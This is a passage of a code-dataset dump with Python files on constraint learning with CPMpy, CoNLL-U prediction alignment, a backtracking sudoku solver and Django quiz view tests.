{}\n vals = f(solutions[:, i])\n bounds[k][(i,)][\"l\"] = min(vals)\n bounds[k][(i,)][\"u\"] = max(vals)\n\n for b in generate_binary_expr(x, y):\n k = str(b)\n bounds[k] = dict()\n f = lambdify([x, y], b, \"math\")\n for (i, j) in index_pairs(n_vars):\n bounds[k][(i, j)] = {}\n vals = f(solutions[:, i], solutions[:, j])\n bounds[k][(i, j)][\"l\"] = min(vals)\n bounds[k][(i, j)][\"u\"] = max(vals)\n return bounds\n\n\ndef filter_negatives(negData, lb, ub): # InComplete\n x, y = symbols(\"x y\")\n for u in generate_unary_exp(x):\n k = str(u)\n\n for i in range(len(lb[k])):\n breaksLB = 0\n for example in negData:\n if u.subs({x: example[i]}) < lb[k][i]:\n breaksLB = 1\n break\n if breaksLB == 0:\n del lb[k]\n\n breaksUB = 0\n for example in negData:\n if u.subs({x: example[i]}) > ub[k][i]:\n breaksUB = 1\n break\n if breaksUB == 0:\n del ub[k]\n\n # for b in generate_binary_expr(x,y):\n # k=str(b)\n #\n # for i in range(len(lb[k])):\n # breaksLB = 0\n # for example in negData:\n # if b.subs({x:v1, y: v2})ub[k][i]:\n # breaksUB = 1\n # break\n # if breaksUB == 1:\n # break\n # if breaksUB == 0:\n # del ub[k]\n #\n # for u in generate_unary_exp(x):\n # for b in generate_binary_expr(x,y):\n # k = str(u)\n # k = k.replace('x', '(' + str(b) + ')')\n # breaksLB = 0\n # for example in negData:\n # for i, (v1, v2) in enumerate(pairs(example)):\n # if u.subs({x: b.subs({x: v1, y: v2})}) < lb[k][i]:\n # breaksLB = 1\n # break\n # if breaksLB == 1:\n # break\n # if breaksLB == 0:\n # del lb[k]\n #\n # breaksUB = 0\n # for example in negData:\n # for i, (v1, v2) in enumerate(pairs(example)):\n # if u.subs({x: b.subs({x: v1, y: v2})}) > ub[k][i]:\n # breaksUB = 1\n # break\n # if breaksUB == 1:\n # break\n # if breaksUB == 0:\n # del ub[k]\n return lb, ub\n\n\ndef create_variables(var_bounds, name):\n return [\n intvar(lb, ub, name=f\"{name}[{i}]\")\n for i, (lb, ub) in enumerate(var_bounds)\n ]\n\n\ndef create_model(var_bounds, expr_bounds, name):\n x, y = symbols(\"x y\")\n cp_vars = create_variables(var_bounds, name)\n\n m = Model()\n for expr, inst in expr_bounds.items():\n for (index), values in inst.items():\n lb = values[\"l\"]\n ub = values[\"u\"]\n if len(index) == 1:\n e = sympify(expr)\n f = lambdify(x, e)\n cpm_e = f(cp_vars[index[0]])\n (v, _) = get_or_make_var(cpm_e)\n if lb != v.lb:\n m += [cpm_e >= lb]\n if ub != v.ub:\n m += [cpm_e <= ub]\n else:\n e = sympify(expr)\n f = lambdify([x, y], e)\n cpm_e = f(cp_vars[index[0]], cp_vars[index[1]])\n (v, _) = get_or_make_var(cpm_e)\n if lb != v.lb:\n m += [cpm_e >= lb]\n if ub != v.ub:\n m += [cpm_e <= ub]\n\n return m, cp_vars\n\n\ndef is_sat(m, m_vars, sols, exp, objectives=None):\n sats = []\n for i, sol in enumerate(sols):\n m2 = Model([c for c in m.constraints])\n m2 += [m_var == sol[i] for i, m_var in enumerate(m_vars)]\n sat = m2.solve()\n if objectives is not None and sat:\n sat = exp(sol) == objectives[i]\n sats.append(sat)\n return sats\n\n\ndef check_solutions(m, mvars, sols, exp, objectives=None):\n if len(sols) == 0:\n print(\"No solutions to check\")\n return 100\n\n sats = is_sat(m, mvars, sols, exp, objectives)\n logger.info(f\"{sum(sats)} satisfied out of {len(sats)}\")\n return sum(sats) * 100.0 / len(sats)\n\n\ndef check_solutions_fast(m: Model, m_vars, sols, objective_exp, objective_values):\n if sols is None:\n print(\"No solutions to check\")\n return 100\n correct_objective = sols\n\n # remove duplicates, if any (happens for type06)\n for i in reversed(range(len(sols))): # backward, for del\n for j in range(i): # forward 
up to and without i\n if np.array_equal(sols[i], sols[j]):\n # sols are equal, check to drop 'i' (at back)\n if objective_values is None:\n del sols[i]\n break\n elif objective_values[i] == objective_values[j]:\n del sols[i]\n del objective_values[i]\n break\n\n # filter out based on objective values, if present\n if objective_values is not None:\n correct_objective = []\n for i, sol in enumerate(sols):\n if objective_exp(sol) == objective_values[i]:\n correct_objective.append(sol)\n\n # print(len(sols), len(correct_objective))\n s = SolverLookup.get(\"ortools\", m)\n s += Table(\n m_vars,\n correct_objective\n )\n cnt = solveAll(s)\n # print(cnt, len(correct_objective))\n logger.info(f\"{cnt} satisfied out of {len(sols)}\")\n return cnt * 100.0 / len(sols), cnt, len(correct_objective), len(sols)\n\n\ndef solutions_sample(model: Model, instance: Instance, size):\n rng = np.random.RandomState(111)\n m_vars = np.hstack([instance.cp_vars[k].flatten() for k in instance.cp_vars])\n vars_lb = np.hstack([instance.var_lbs[k].flatten() for k in instance.var_lbs])\n vars_ub = np.hstack([instance.var_ubs[k].flatten() for k in instance.var_ubs])\n # print(vars, vars_lb, vars_ub)\n sols = []\n start = time.time()\n while len(sols) < size and time.time() - start < 60:\n sol = []\n m_copy = Model([c for c in model.constraints])\n for i, var in enumerate(m_vars):\n random_val = rng.randint(vars_lb[i], vars_ub[i])\n sol.append(random_val)\n m_copy += [var == random_val]\n if m_copy.solve():\n sols.append(sol)\n return sols\n\n\n# def solutions(model: Model, size):\n# rng = np.random.RandomState(111)\n# cp_vars = get_variables_model(model)\n# # print(cp_vars)\n# s = SolverLookup.get(\"ortools\", model)\n# # s += sum(cp_vars) >= 0\n# vars_lb = []\n# vars_ub = []\n# for var in cp_vars:\n# vars_lb.append(var.lb)\n# vars_ub.append(var.ub)\n# sols = []\n# sol_count = 0\n# while s.solve() and sol_count < size:\n# sols.append([var.value() for var in cp_vars])\n# s += ~all([var == var.value() for var in cp_vars])\n# initial_point = []\n# for i, v in enumerate(cp_vars):\n# initial_point.append(rng.randint(vars_lb[i], vars_ub[i]))\n# s.solution_hint(cp_vars, initial_point)\n# sol_count += 1\n# return sols\n\n\ndef solutions(model: Model, instance: Instance, size):\n rng = np.random.RandomState(111)\n s = SolverLookup.get(\"ortools\", model)\n # model = Model([c for c in model.constraints])\n # model = CPM_ortools(model)\n vars = np.hstack([instance.cp_vars[k].flatten() for k in instance.cp_vars])\n s += sum(vars) >= 0\n vars_lb = np.hstack([instance.var_lbs[k].flatten() for k in instance.var_lbs])\n vars_ub = np.hstack([instance.var_ubs[k].flatten() for k in instance.var_ubs])\n\n sols = []\n sol_count = 0\n while s.solve() and sol_count < size:\n sols.append([var.value() for var in vars])\n s += ~all([var == var.value() for var in vars])\n initial_point = []\n for i, v in enumerate(vars):\n initial_point.append(rng.randint(vars_lb[i], vars_ub[i]))\n s.solution_hint(vars, initial_point)\n sol_count += 1\n return sols\n\n\ndef statistic(model1, model2, instance: Instance, size=100):\n sols = solutions(model1, instance, size)\n print(f\"Number of solutions: {len(sols)}\")\n if len(sols) == 0:\n return 0\n # print(len(sols), type(sols), type(sols[0]), type(sols[0][0]))\n vars = np.hstack([instance.cp_vars[k].flatten() for k in instance.cp_vars])\n s = SolverLookup.get(\"ortools\", model2)\n s += Table(vars, sols)\n cnt = solveAll(s)\n # print(f\"Number of solutions: {len(sols)}\")\n return cnt * 100 / len(sols)\n\n\ndef 
compare_models(learned_model: Model, target_model: Model, instance):\n recall = statistic(target_model, learned_model, instance)\n precision = statistic(learned_model, target_model, instance)\n # print(f\"Precision: {precision}, Recall: {recall}\")\n return precision, recall\n\n\ndef compare_models_count(learned_model: Model, target_model: Model, cp_vars):\n s = CPM_ortools(target_model)\n cb = OrtSolutionCounter()\n s.solve(enumerate_all_solutions=True, solution_callback=cb)\n target_count = cb.solution_count()\n print(f\"target_count: {target_count}\")\n\n s = CPM_ortools(learned_model)\n cb = OrtSolutionCounter()\n s.solve(enumerate_all_solutions=True, solution_callback=cb)\n learned_count = cb.solution_count()\n print(f\"learned_count: {learned_count}\")\n\n combined_model = Model([c for c in learned_model.constraints])\n combined_model.constraints.extend([c for c in target_model.constraints])\n s = CPM_ortools(combined_model)\n cb = OrtSolutionCounter()\n s.solve(enumerate_all_solutions=True, solution_callback=cb)\n combined_count = cb.solution_count()\n print(f\"combined_count: {combined_count}\")\n\n recall = combined_count * 100 / target_count\n precision = combined_count * 100 / learned_count\n print(f\"Precision: {precision}, Recall: {recall}\")\n return precision, recall\n\n\ndef check_obective(exp, sols, objectives, verbose=False):\n if len(sols) == 0:\n print(\"No solutions to check\")\n return 1.0\n sats = []\n for i, sol in enumerate(sols):\n sat = exp(sol) == objectives[i]\n sats.append(sat)\n\n if verbose:\n if sat:\n print(f\"Sol {sol} indeed satisfies the objective {exp(sol)}\")\n else:\n print(f\"!!! Sol {sol} does not satisfy the objective {exp(sol)}\")\n print(f\"{sum(sats)} objectives satisfied out of {len(sats)}\")\n return sum(sats) * 100.0 / len(sats)\n\n\ndef strip_empty_entries(dictionary):\n new_data = {}\n for k, v in dictionary.items():\n if isinstance(v, dict):\n v = strip_empty_entries(v)\n if v not in (\"\", None, {}):\n new_data[k] = v\n return new_data\n\n\ndef filter_redundant(expr_bounds, constraints, mapping=None):\n constraints = [c for c in constraints] # take copy\n i = 0\n while i < len(constraints):\n m2 = Model(constraints[:i] + constraints[i + 1:])\n m2 += ~all(constraints[i])\n if m2.solve():\n i += 1\n else:\n del constraints[i]\n\n if mapping:\n del expr_bounds[mapping[i][0]][mapping[i][1]][mapping[i][2]]\n del mapping[i]\n\n expr_bounds = strip_empty_entries(expr_bounds)\n return expr_bounds, constraints\n\n\ndef generate_unary_sequences(n):\n def even(n):\n lst = []\n for i in range(0, n, 2):\n lst.append((i,))\n return lst\n\n def odd(n):\n lst = []\n for i in range(1, n, 2):\n lst.append((i,))\n return lst\n\n def series(n):\n lst = []\n for i in range(0, n):\n lst.append((i,))\n return lst\n\n lst = {}\n\n if even(n):\n lst[\"evenUn\"] = even(n)\n if odd(n):\n lst[\"oddUn\"] = odd(n)\n if series(n):\n lst[\"seriesUn\"] = series(n)\n return lst\n\n\ndef generate_binary_sequences(n, data=None):\n def even(n):\n lst = []\n for i in range(0, n - 2, 2):\n lst.append((i, i + 2))\n return lst\n\n def odd(n):\n lst = []\n for i in range(1, n - 2, 2):\n lst.append((i, i + 2))\n return lst\n\n def series(n):\n lst = []\n for i in range(0, n - 1):\n lst.append((i, i + 1))\n return lst\n\n def all_pairs(n):\n return list(it.combinations(range(n), r=2))\n\n lst = {}\n if even(n):\n lst[\"evenBin\"] = even(n)\n if odd(n):\n lst[\"oddBin\"] = odd(n)\n if series(n):\n lst[\"seriesBin\"] = series(n)\n if all_pairs(n):\n lst[\"allBin\"] = all_pairs(n)\n 
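# Caller-supplied index pairs (e.g. sequences read from the instance JSON)\n # are exposed as an extra \"jsonSeq\" group alongside the generated ones.\n 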
if data:\n lst[\"jsonSeq\"] = data\n return lst\n\n\ndef generalise_bounds(bounds, size, inputData):\n generalBounds = {}\n unSeq = generate_unary_sequences(size)\n binSeq = generate_binary_sequences(size, inputData)\n x, y = symbols(\"x y\")\n for b in generate_binary_expr(x, y):\n exp = str(b)\n generalBounds[exp] = {}\n for k, seq in binSeq.items():\n generalBounds[exp][k] = {}\n tmp = np.array(\n [[bounds[exp][tple][\"l\"], bounds[exp][tple][\"u\"]] for tple in seq]\n )\n generalBounds[exp][k][\"l\"] = min(tmp[:, 0])\n generalBounds[exp][k][\"u\"] = max(tmp[:, 1])\n\n for u in generate_unary_exp(x):\n exp = str(u)\n generalBounds[exp] = {}\n for k, seq in unSeq.items():\n generalBounds[exp][k] = {}\n tmp = np.array(\n [[bounds[exp][tple][\"l\"], bounds[exp][tple][\"u\"]] for tple in seq]\n )\n generalBounds[exp][k][\"l\"] = min(tmp[:, 0])\n generalBounds[exp][k][\"u\"] = max(tmp[:, 1])\n return generalBounds\n\n\ndef create_gen_model(var_bounds, genBounds, name, inputData):\n cp_vars = create_variables(var_bounds, name)\n size = len(cp_vars)\n unSeq = generate_unary_sequences(size)\n binSeq = generate_binary_sequences(size, inputData)\n x, y = symbols(\"x y\")\n m = Model()\n mapping = []\n for expr, inst in genBounds.items():\n e = sympify(expr)\n numSym = len(e.atoms(Symbol))\n if numSym == 1:\n for seq, values in inst.items():\n constraints_l = []\n constraints_u = []\n for index in unSeq[seq]:\n f = lambdify(x, e)\n cpm_e = f(cp_vars[index[0]])\n (v, _) = get_or_make_var(cpm_e)\n if \"l\" in values:\n # m += [cpm_e >= values['l']]\n constraints_l.append(cpm_e >= values[\"l\"])\n if \"u\" in values:\n # m += [cpm_e <= values['u']]\n constraints_u.append(cpm_e <= values[\"u\"])\n # print(tmp)\n if constraints_l:\n mapping.append([expr, seq, \"l\"])\n m += constraints_l\n if constraints_u:\n m += constraints_u\n mapping.append([expr, seq, \"u\"])\n else:\n for seq, values in inst.items():\n constraints_l = []\n constraints_u = []\n for index in binSeq[seq]:\n f = lambdify([x, y], e)\n cpm_e = f(cp_vars[index[0]], cp_vars[index[1]])\n (v, _) = get_or_make_var(cpm_e)\n if \"l\" in values:\n # m += [cpm_e >= values['l']]\n constraints_l.append(cpm_e >= values[\"l\"])\n if \"u\" in values:\n # m += [cpm_e <= values['u']]\n constraints_u.append(cpm_e <= values[\"u\"])\n if constraints_l:\n m += constraints_l\n mapping.append([expr, seq, \"l\"])\n if constraints_u:\n m += constraints_u\n mapping.append([expr, seq, \"u\"])\n return m, cp_vars, mapping\n\n\ndef filter_trivial(var_bounds, genBounds, size, name, inputData):\n cp_vars = create_variables(var_bounds, name)\n\n unSeq = generate_unary_sequences(size)\n binSeq = generate_binary_sequences(size, inputData)\n x, y = symbols(\"x y\")\n for expr, inst in genBounds.items():\n e = sympify(expr)\n numSym = len(e.atoms(Symbol))\n if numSym == 1:\n for seq, values in inst.items():\n lb = values[\"l\"]\n ub = values[\"u\"]\n for index in unSeq[seq]:\n f = lambdify(x, e)\n cpm_e = f(cp_vars[index[0]])\n (v, _) = get_or_make_var(cpm_e)\n if lb == v.lb:\n del genBounds[expr][seq][\"l\"]\n break\n if ub == v.ub:\n del genBounds[expr][seq][\"u\"]\n break\n else:\n for seq, values in inst.items():\n lb = values[\"l\"]\n ub = values[\"u\"]\n for index in binSeq[seq]:\n f = lambdify([x, y], e)\n cpm_e = f(cp_vars[index[0]], cp_vars[index[1]])\n (v, _) = get_or_make_var(cpm_e)\n if lb == v.lb:\n del genBounds[expr][seq][\"l\"]\n break\n if ub == v.ub:\n del genBounds[expr][seq][\"u\"]\n break\n return genBounds\n\n\nif __name__ == \"__main__\":\n import 
os, glob\n import pandas as pd\n\n all_files = glob.glob(os.path.join(\"results/\", \"*.json\"))\n final_output = {\"email\": \"mohit.kumar@cs.kuleuven.be\", \"name\": \"Mohit Kumar\"}\n results = []\n for f in all_files:\n tmp = json.load(open(f))\n if tmp[\"tests\"]:\n results.append(tmp)\n final_output[\"results\"] = results\n with open(f\"final_results.json\", \"w\") as f:\n json.dump(final_output, f)\n\n # df_from_each_file = (pd.read_csv(f, sep=',') for f in all_files)\n # df_merged = pd.concat(df_from_each_file, ignore_index=True)\n # df_merged.to_csv(\"merged.csv\")\n","repo_name":"mohitKULeuven/pthg21","sub_path":"learner.py","file_name":"learner.py","file_ext":"py","file_size_in_byte":20100,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"24249760438","text":"#!/usr/bin/env python3\n\nimport sys\nfrom collections import defaultdict\n\n\ndef check_inputs():\n \"\"\"The function that checks if all inputs are in right order, and all the files are present\"\"\"\n help_text = \"Arg1: Original Test File (in CONLL-U format)\\n\" \\\n \"Arg2: Final Annotations File\\n\" \\\n \"Usage: python3 {x} Arg1 Arg2\".format(x=sys.argv[0])\n if len(sys.argv) != 3:\n print(help_text)\n exit(0)\n\n\ndef align_sent_id(orig_file, annotated_file):\n \"\"\"The function that aligns sentences IDs from CONLL-U file to the annotated test data for easy debugging\"\"\"\n sent_dict = dict()\n mismatch_dict = defaultdict(dict)\n match_dict = defaultdict(dict)\n with open(orig_file, \"r\", encoding=\"utf-8\") as orig_handle:\n sent_id = \"\"\n for line in orig_handle:\n if line.startswith(\"# sent_id\"):\n sent_id = line.strip(\"\\n\").split(\" = \")[1]\n if line.startswith(\"# text\"):\n text = line.strip(\"\\n\").split(\" = \")[1]\n sent_dict[sent_id] = text\n # time to get the data\n with open(annotated_file, \"r\", encoding=\"utf-8\") as annotated_handle:\n sentence = \"\"\n a = []\n b = []\n token_id = 0\n for line in annotated_handle:\n if line == \"\\n\":\n token_id = 0\n for key in sent_dict:\n if sent_dict[key] == sentence.rstrip():\n break\n if len(a) != 0:\n temp = dict()\n temp[\"text\"] = sentence.rstrip()\n temp[\"values\"] = a\n mismatch_dict[key] = temp\n if len(b) != 0:\n temp2 = dict()\n temp2[\"text\"] = sentence.rstrip()\n temp2[\"values\"] = b\n match_dict[key] = temp2\n a = []\n b = []\n sentence = \"\"\n else:\n token, true, predict, score = line.strip(\"\\n\").split()\n sentence += token + \" \"\n if true != predict:\n tup1 = (token, token_id, true, predict, round(float(score), 4))\n a.append(tup1)\n elif true == predict:\n tup2 = (token, token_id, true, round(float(score), 4))\n b.append(tup2)\n token_id += 1\n return mismatch_dict, match_dict\n\n\ndef generate_distribution(label, structure):\n with open(\"{x}.list\".format(x=label), \"a\", encoding=\"utf-8\") as outfile:\n for key in structure.keys():\n for vals in structure[key][\"values\"]:\n if vals[2] == label and vals[3] <= 0.70:\n outfile.write(\"{x}\\n\".format(x=vals[2]))\n\n\nif __name__ == \"__main__\":\n check_inputs()\n mismatched_instances, match_instances = align_sent_id(sys.argv[1], sys.argv[2])\n\n # Implement TOKEN_ ID Universally if possible\n with open(\"mismatched.tsv\", \"a+\", encoding=\"utf-8\") as outfile:\n for key in mismatched_instances.keys():\n text = mismatched_instances[key][\"text\"]\n for vals in mismatched_instances[key][\"values\"]:\n val1, tid, val2, val3, val4 = vals\n outfile.write(\n 
\"{x}\\t{v1}\\t{ti}\\t{v2}\\t{v3}\\t{v4}\\t{t}\\n\".format(x=key, v1=val1, ti=tid, v2=val2, v3=val3, v4=val4,\n t=text))\n\n with open(\"matched.tsv\", \"a+\", encoding=\"utf-8\") as outfile:\n for key in match_instances.keys():\n text = match_instances[key][\"text\"]\n for vals in match_instances[key][\"values\"]:\n val1, tid, val2, val3 = vals\n outfile.write(\n \"{x}\\t{v1}\\t{ti}\\t{v2}\\t{v3}\\t{t}\\n\".format(x=key, v1=val1, ti=tid, v2=val2, v3=val3, t=text))\n\n for x in [\"S-verb\", \"S-aux\", \"O\"]:\n generate_distribution(x, match_instances)\n","repo_name":"Akshayanti/Masters-Thesis-CUNI-2020","sub_path":"AUX-vs-VERB-UDv2.4/scripts/categorise_predictions.py","file_name":"categorise_predictions.py","file_ext":"py","file_size_in_byte":3966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"43840158936","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 19 11:11:52 2020\n\n@author: nooreen\n\"\"\"\nimport sys\nsys.setrecursionlimit(111500)\n\ndef show(board):\n for i in range(len(board)):\n if i % 3 == 0:\n if i == 0:\n print(\" ┎────────┰────────┰────────┒\")\n else:\n print(\" ┠────────╂────────╂────────┨\")\n\n for j in range(len(board[0])):\n if j % 3 == 0:\n print(\" ┃\", end=\" \")\n\n if j == 8:\n print(board[i][j], \" ┃\")\n else:\n print(board[i][j], end=\" \")\n\n print(\" ┖────────┸────────┸────────┚\")\n\n\nboard = [[3, 7, 0, 5, 0, 0, 0, 0, 6],\n [0, 0, 0, 3, 6, 0, 0, 1, 2],\n [0, 0, 0, 0, 9, 1, 7, 5, 0],\n [0, 0, 0, 1, 5, 4, 0, 7, 0],\n [0, 0, 3, 0, 7, 0, 6, 0, 0],\n [0, 5, 0, 6, 3, 8, 0, 0, 0],\n [0, 6, 4, 9, 8, 0, 0, 0, 0],\n [5, 9, 0, 0, 2, 6, 0, 0, 0],\n [2, 0, 0, 0, 0, 5, 0, 6, 4]]\n\ndef exists_in_row(board,number, empty_i):\n for i in range(len(board[0])):\n if board[empty_i][i] == number:\n return False\n\ndef exists_in_column(board,number, empty_j):\n for i in range(len(board[0])):\n if board[i][empty_j] == number:\n return False\n\n\ndef check_in_column(number):\n for i in range(len(board[0])):\n return False\n\n\ndef check_in_box(number):\n for i in range(len(board[0])):\n return False\n\n\ndef valid_options_for_current_cell(board, number,current_empty_row,current_empty_column):\n \n # Check row\n for i in range(len(board[0])):\n if board[current_empty_row][i] == number and current_empty_column != i:\n return False\n # Check column\n for i in range(len(board)):\n if board[i][current_empty_column] == number and current_empty_row != i:\n return False\n # Check box\n box_x = current_empty_column // 3\n box_y = current_empty_row // 3\n\n for i in range(box_y*3, box_y*3 + 3):\n for j in range(box_x*3, box_x*3 + 3):\n if board[i][j] == number and (i, j) != current_empty_column and current_empty_row:\n return False\n\n return True\n\ndef boxposition(element):\n board_pos = 0\n if element == 0 or element <= 2:\n board_pos = 0\n if element > 2 and element < 6:\n board_pos = 3\n if element > 5 and element < 9:\n board_pos = 6\n return (board_pos)\n\n\ndef backtrack(current_empty_row, current_empty_column):\n board[current_empty_row][current_empty_column - 1] = 0\n\n\ndef find_empty(board):\n for i in range(len(board)):\n for j in range(len(board)):\n if board[i][j] == 0:\n return i, j\n\n\ndef solve(board):\n empty_slots = find_empty(board)\n if not empty_slots:\n return True\n else:\n current_empty_row, current_empty_column = empty_slots\n\n\n for number in range(1, 10):\n if valid_options_for_current_cell(board, number, current_empty_row, current_empty_column):\n 
board[current_empty_row][current_empty_column] = number\n\n if solve(board):\n return True\n\n board[current_empty_row][current_empty_column]=0\n return False\n\n\nshow(board);\nsolve(board);\nprint(\" Sodoku puzzle at initial state\")\nprint(\"________________________________\")\n\nshow(board);\n\nprint(\" Sodoku puzzle at final stage\")\nprint(\"________________________________\")\n\n\n","repo_name":"noor60/Soduku-Project","sub_path":"sudoku-1.py","file_name":"sudoku-1.py","file_ext":"py","file_size_in_byte":3587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"13610544127","text":"import re\nfrom nose.tools import *\n\nfrom django.contrib.auth.models import User\nfrom django.core.urlresolvers import reverse\nfrom django.test import TestCase\n\nfrom quiz.forms import EmailForm\nfrom quiz.models import Quiz, QuizResult, Question\nfrom quiz.views import redirect_to_quiz_list\n\n\nclass TestQuizListView(TestCase):\n fixtures = ['python-zen.yaml']\n # 1 quiz, 9 questions, 26 answers, 9 correct answers (one per question)\n\n def setUp(self):\n super(TestQuizListView, self).setUp()\n self.quiz = Quiz.objects.get(slug='python-zen')\n\n def test_quiz_list_view_with_single_live_quiz(self):\n response = self.client.get(reverse('quiz_list'), follow=True)\n self.assertContains(response, self.quiz.name, count=1, status_code=200)\n self.assertContains(response, self.quiz.description, count=1)\n\n def test_quiz_list_view_with_single_draft_quiz(self):\n self.quiz.status=Quiz.DRAFT\n self.quiz.save()\n response = self.client.get(reverse('quiz_list'), follow=True)\n self.assertNotContains(response, self.quiz.name, status_code=200)\n self.assertNotContains(response, self.quiz.description)\n\n def test_quiz_list_view_with_single_closed_quiz(self):\n self.quiz.status=Quiz.CLOSED\n self.quiz.save()\n response = self.client.get(reverse('quiz_list'), follow=True)\n self.assertNotContains(response, self.quiz.name, status_code=200)\n self.assertNotContains(response, self.quiz.description)\n\n def test_quiz_list_view_with_two_live_quizzes(self):\n q2 = Quiz.objects.create(\n name='Test Quiz 2',\n slug='test-quiz-2',\n description='Foobar',\n status=Quiz.LIVE\n )\n response = self.client.get(reverse('quiz_list'), follow=True)\n self.assertContains(response, self.quiz.name, count=1, status_code=200)\n self.assertContains(response, self.quiz.description, count=1)\n self.assertContains(response, q2.name, count=1, status_code=200)\n self.assertContains(response, q2.description, count=1)\n\n\nclass TestQuizDetailView(TestCase):\n fixtures = ['python-zen.yaml', 'testuser.yaml']\n # 1 quiz, 9 questions, 26 answers, 9 correct answers (one per question)\n # A single test-user, TestyMcTesterson, with password 'password'\n\n input_re = re.compile('name=\"([^\"]+)\" value=\"([^\"]+)\"')\n\n def setUp(self):\n super(TestQuizDetailView, self).setUp()\n self.quiz = Quiz.objects.get(slug='python-zen')\n self.user = User.objects.get(username='TestyMcTesterson')\n\n self.data = ({\n 'wizard_step': '0',\n '0-INITIAL_FORMS': 4,\n '0-TOTAL_FORMS': 4,\n '0-0-answers': 3,\n '0-1-answers': 4,\n '0-2-answers': 9,\n '0-3-answers': 11,\n }, {\n 'wizard_step': '1',\n '1-INITIAL_FORMS': 3,\n '1-TOTAL_FORMS': 3,\n '1-0-answers': 14,\n '1-1-answers': 16,\n '1-2-answers': 20\n }, {\n 'wizard_step': '2',\n '2-INITIAL_FORMS': 2,\n '2-TOTAL_FORMS': 2,\n '2-0-answers': 23,\n '2-1-answers': 26,\n }\n )\n\n def grab_field_data(self, response):\n \"\"\"\n Pulls the appropriate field data from 
the context to pass to the next\n wizard step.\n\n -- Excerpted (but modified) from actual Django Formwizard tests\n \"\"\"\n previous_fields = \"\".join([\n f.as_text() for f in response.context['previous_fields']\n ])\n fields = {'wizard_step': response.context['step0']}\n\n def grab(m):\n fields[m.group(1)] = m.group(2)\n return ''\n\n self.input_re.sub(grab, previous_fields)\n return fields\n\n def complete_quiz(self, slug):\n response = self.client.post(\n reverse('quiz_detail', args=[slug]), data=self.data[0]\n )\n assert_equal(200, response.status_code)\n data = self.grab_field_data(response)\n data.update(self.data[1])\n response = self.client.post(\n reverse('quiz_detail', args=[slug]), data=data\n )\n data = self.grab_field_data(response)\n data.update(self.data[2])\n response = self.client.post(\n reverse('quiz_detail', args=[slug]), data=data\n )\n return response\n\n def test_quiz_detail_view_with_no_inputs(self):\n response = self.client.get(\n reverse('quiz_detail', args=[self.quiz.slug]), follow=True\n )\n assert_equal(200, response.status_code)\n\n def test_quiz_detail_view_with_good_inputs_authenticated(self):\n self.assertTrue(\n self.client.login(username=self.user.username, password='password')\n )\n assert_false(QuizResult.objects.count())\n response = self.complete_quiz(self.quiz.slug)\n quiz_result = QuizResult.objects.get(\n quiz=self.quiz, user=self.user\n )\n self.assertRedirects(\n response,\n reverse('quiz_completed', args=(self.quiz.slug, quiz_result.pk)),\n status_code=302,\n target_status_code=200\n )\n assert_equal(self.user.email, quiz_result.email)\n assert_equal(quiz_result.score, self.quiz.questions.answers.maximum_score)\n assert_equal(quiz_result.score, quiz_result.maximum_score)\n assert_equal(\n set(quiz_result.answers.all()), set(self.quiz.questions.answers.correct)\n )\n\n def test_quiz_detail_redirects_for_anon_users_with_no_session_email(self):\n response = self.client.get(\n reverse('quiz_detail', args=(self.quiz.slug,)), follow=True\n )\n expected_redirect = \"%s?next=%s\" % (\n reverse('quiz_capture_email'),\n reverse('quiz_detail', args=(self.quiz.slug,))\n )\n self.assertRedirects(response, expected_redirect)\n\n def test_quiz_detail_view_with_good_inputs_unauthenticated(self):\n assert_false(QuizResult.objects.count())\n\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Waiting for this to land... 
http://code.djangoproject.com/ticket/10899\n # What SHOULD be as simple as this:\n # >>> self.client.session['email'] = 'foo@bar.com'\n # is currently this madness...\n from django.conf import settings\n from django.utils.importlib import import_module\n engine = import_module(settings.SESSION_ENGINE)\n store = engine.SessionStore()\n store.save() # we need to make load() work, or the cookie is worthless\n self.client.cookies[settings.SESSION_COOKIE_NAME] = store.session_key\n session = self.client.session\n session['email'] = 'foo@bar.com'\n session.save()\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n response = self.complete_quiz(self.quiz.slug)\n quiz_result = QuizResult.objects.get(\n quiz=self.quiz, email='foo@bar.com'\n )\n self.assertRedirects(\n response,\n reverse('quiz_completed', args=(self.quiz.slug, quiz_result.pk)),\n status_code=302,\n target_status_code=200\n )\n assert not quiz_result.user\n assert_equal(quiz_result.score, self.quiz.questions.answers.maximum_score)\n assert_equal(quiz_result.score, quiz_result.maximum_score)\n assert_equal(\n set(quiz_result.answers.all()), set(self.quiz.questions.answers.correct)\n )\n\n def test_quiz_detail_for_draft_quiz_displays(self):\n self.quiz.status = Quiz.DRAFT\n self.quiz.save()\n response = self.client.get(self.quiz.get_absolute_url(), follow=True)\n assert_equal(200, response.status_code)\n\n def test_quiz_detail_for_closed_quiz_not_found(self):\n self.quiz.status = Quiz.CLOSED\n self.quiz.save()\n response = self.client.get(self.quiz.get_absolute_url(), follow=True)\n assert_equal(404, response.status_code)\n\n\nclass TestQuizCaptureEmailView(TestCase):\n fixtures = ['python-zen.yaml', 'testuser.yaml']\n # 1 quiz, 9 questions, 26 answers, 9 correct answers (one per question)\n # A single test-user, TestyMcTesterson, with password 'password'\n\n def setUp(self):\n super(TestQuizCaptureEmailView, self).setUp()\n self.quiz = Quiz.objects.get(slug='python-zen')\n self.user = User.objects.get(username='TestyMcTesterson')\n\n def test_authenticated_users_redirected_to_quiz_list(self):\n self.client.login(username=self.user.username, password='password')\n response = self.client.get(reverse('quiz_capture_email'), follow=True)\n self.assertRedirects(response, reverse('quiz_list'))\n\n def test_unauthenticated_users_not_redirected(self):\n response = self.client.get(reverse('quiz_capture_email'), follow=True)\n assert_equal(200, response.status_code)\n\n def test_emailform_success(self):\n data = {'email': 'foo@bar.com'}\n response = self.client.post(\n reverse('quiz_capture_email'), data=data, follow=True\n )\n self.assertRedirects(response, reverse('quiz_list'))\n assert_equal(data['email'], response.client.session['email'])\n response = self.client.get(\n reverse('quiz_detail', args=(self.quiz.slug,)), follow=True\n )\n assert_equal(200, response.status_code)\n\n def 